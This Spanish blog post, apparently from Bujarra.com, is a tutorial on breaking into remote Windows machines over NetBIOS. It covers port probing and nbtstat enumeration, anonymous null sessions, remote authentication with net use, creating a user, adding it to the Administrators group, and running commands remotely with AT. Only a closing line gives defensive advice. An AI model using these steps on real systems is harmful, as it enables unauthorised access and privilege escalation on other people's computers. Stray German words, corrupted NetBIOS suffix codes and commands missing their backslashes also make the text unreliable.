Hacking con NetBIOS

En esta web se mostrarán diferentes manera de sacar todos los datos posibles a un PC remoto mediante NetBIOS.

Lo primero de todo es comprobar que el equipo al que queremos conectarnos tiene el puerto NetBIOS abierto, das puerto es el 139; se puede hacer mediante la concola de MSDOS con ete comando: telnet DIRECCIONIP 139 y si se conecta lo tendrá abierto y sino pues a buscar otro PC.

Lo Segundo más importante es tener la tabla NetBios, que nos indicará que servicios tiene en ejecución el equipo remoto que comrobaremos con los resultados obtenidos con posteriores comandos

Name
Sufijo
Kerl
Dienst
<computername>
00
Oder
Workstation Service
<computername>
01
Oder
Messenger Service
<_MSBROWSE_>
01
G
Master Browser
<computername>
03
Oder
Messenger Service
<computername>
06
Oder
RAS Server Service
<computername>
1F
Oder
NetDDE Service
<computername>
20
Oder
File Server Service
<computername>
21
Oder
RAS Client Service
<computername>
22
Oder
Exchange Interchange
<computername>
23
Oder
Exchange Store
<computername>
24
Oder
Exchange Directory
<computername>
30
Oder
Modem Sharing Server Service
<computername>
31
Oder
Modem Sharing Client Service
<computername>
43
Oder
SMS Client Remote Control
<computername>
44
Oder
SMS Admin Remote Control Tool
<computername>
45
Oder
SMS Client Remote Chat
<computername>
46
Oder
SMS Client Remote Transfer
<computername>
4C
Oder
DEC Pathworks TCPIP Service
<computername>
52
Oder
DEC Pathworks TCPIP Service
<computername>
87
Oder
Exchange MTA
<computername>
6An
Oder
Exchange IMC
<computername>
BE
Oder
Network Monitor Agent
<computername>
BF
Oder
Network Monitor Apps
<Nutzername>
03
Oder
Messenger Service
<Domäne>
00
G
Domänenname
<Domäne>
1B
Oder
Domain Master Browser
<Domäne>
1C
G
Domain Controllers
<Domäne>
1D
Oder
Master Browser
<Domäne>
1Und
G
Browser Service Elections
<INet~Services>
1C
G
Internet Information Server
<IS~Computer_name>
00
Oder
Internet Information Server

Con este comando de MSDOS podremos saber que servicios corre la maquina remota: nbtstat -A DIRECCIONIP oder nbtstat -a NOMBREPC. Aparte de esto también nos dará la direccion MAC por si nos interesase.

NetBIOS
Como podremos ver en la imagen hacemos un nbtstat a una IP o nombrePC y nos da esos resultados, que los comparamos con la tabla NetBIOS y sacaremos datos jugosos como su usuario, al dominio que pertenecey si fuese un Controlador de Dominio veriamos los servicios que corre.

Para establecer lo que se llama sesión nula, tenemos que ejecutar este comando: net use DIRECCIONIPIPC$ “”/u:”” . Lo que realmente hace este comando es autenticarse en el PC remoto con el usuario anonimo.

Para autenticarnos en un equipo remoto con un usuario en concreto: net use DIRECCIONIP /u:USUARIO CONTRASEÑA oder net use DIRECCIONIPC$ /u:USUARIO CONTRASEÑA oder net use DIRECCIONIPRECURSO /u:USUARIO CONTRASEÑA Una vez autenticados en el host remoto para ver el contenido de la carpeta se puede hacer net view DIRECCIONIP y veremos el contenido via MSDOS, pero tambien puedes hacer, ANFANG > EJECUTAR y pones lo que quieras: DIRECCIONIP o DIRECCIONIPRECURSO y te mostrará con la ventana del explorador de Windows el contenido.

Ver la hora remota: net time DIRECCIONIP
Ver dominios disponibles: net view /domain
Ver equipos de un dominio concreto: net view /domain:BUJARRA
Ver los usuarios de un equipo: net user
Ver los detalles de un usuario: net user nombreusuario
Crear un usuario: net user username password /ADD (Ideal para crear un usuario en un PC remoto con el comando AT)
Borrar un usuario: net user nombreusuario /DELETE
Ver los grupos de un PC: net group
Meter a un usuario en un grupo: net group namegroupusername /ADD (Ideal para meter en grupo Administradores al usuario que hemos creado remotamente en un PC)
Sacar a un usuario de un grupo: net group nombregrupo nombreusuario /
DELETE

Befehl AT, para ejecutar cosas en remoto. Con el comando at DIRECCIONIP veremos las tareas programadas que tiene su equipo y con el comando at DIRECCIONIP 21:30 /INTERACTIVEcomando de msdos a ejecutar en el PC remoto”. En el comando anterior el valor 21:30 es la hora a la que le he puesto yo que se ejecute el comando de MSDOS que va entre comillas, así que se le puede poner cualquier hora, pero primero mira mejor que hora tiene!

La herramienta del Kit de Recursos de MS Windows nltest.rar muestra los controladores de dominio de un dominio en concreto, Beispiel:
C:>nltest /dclist:bujarra.com
List pof DCS in Domain bujarra.com
bujarra01

Interesante sería el programa Nbtscan que lo que hace es un ‘nbtstatde toda una red a una velocidad impresionante.Ejemplo:

C:>nbtscan 192.168.0.0/24
&nbspDoing NBT name scan for addresses from 192.168.0.0/24
&nbspIP address &nbspNetBIOS Server &nbspServer &nbspUser &nbspMAC address
&nbsp—————————————————————————–
&nbsp192.168.0.0 &nbspSendto failed: Cannot assign requested address
&nbsp192.168.0.1 &nbspBUJARRA01 <Server> <unbekannt> &nbsp00-e0-7d-78-11-e6
&nbsp192.168.0.13 &nbspMARIA <Server> &nbspMARIA &nbsp00-e0-7d-76-5a-2b
&nbsp192.168.0.55 &nbspVICETOPC <Server> &nbspVICETO 00-00-f8-30-fa-23
&nbsp192.168.0.100 &nbspRecvfrom failed: Connection reset by peer

Für protegernos de este tipo de ataques debemos o cerrar el puerto 139 en el router, o habilitaremos el firewall en XP o quitaremos el servicio de compartir carpetas e impresoras para redes microsoft (en cualquier S.O. Microsofts).


Empfohlene Beiträge

Verfasser

nheobug@bujarra.com
Autor del blog Bujarra.com Cualquier necesidad que tengas, Zögern Sie nicht, mich zu kontaktieren, Ich werde versuchen, dir zu helfen, wann immer ich kann, Teilen ist Leben ;) . Genießen Sie Dokumente!!!